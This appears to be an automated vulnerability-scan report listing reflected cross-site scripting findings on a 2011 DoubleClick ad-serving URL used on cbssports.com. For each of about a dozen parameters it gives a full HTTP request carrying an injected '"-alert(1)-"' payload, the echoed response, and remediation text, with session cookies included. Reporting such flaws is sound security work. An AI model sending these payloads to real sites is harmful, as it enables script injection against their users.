GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=86d72"-alert(1)-"3044e5f3dbb&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; va ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9555"-alert(1)-"c8daeff0702 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... p=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=c9555"-alert(1)-"c8daeff0702http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59da1"-alert(1)-"eaf124f5b59 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn59da1"-alert(1)-"eaf124f5b59&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214. ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 775c5"-alert(1)-"994e6e2c419 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 6%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US775c5"-alert(1)-"994e6e2c419&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84197"-alert(1)-"7be177ce9c5 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=2240884197"-alert(1)-"7be177ce9c5&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21. ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8102d"-alert(1)-"fa280264549 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 7/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a8102d"-alert(1)-"fa280264549&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9bd0"-alert(1)-"79bd7310a71 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45e"-alert(1)-"e197175aae8 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201c0"-alert(1)-"1c5f71daa33 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243& ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfa2"-alert(1)-"617b1722fc6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd5ca"-alert(1)-"c31bbc784d7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... &pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365f4"-alert(1)-"953eb1f2ac7 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbssports.com/ads/local-page.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: 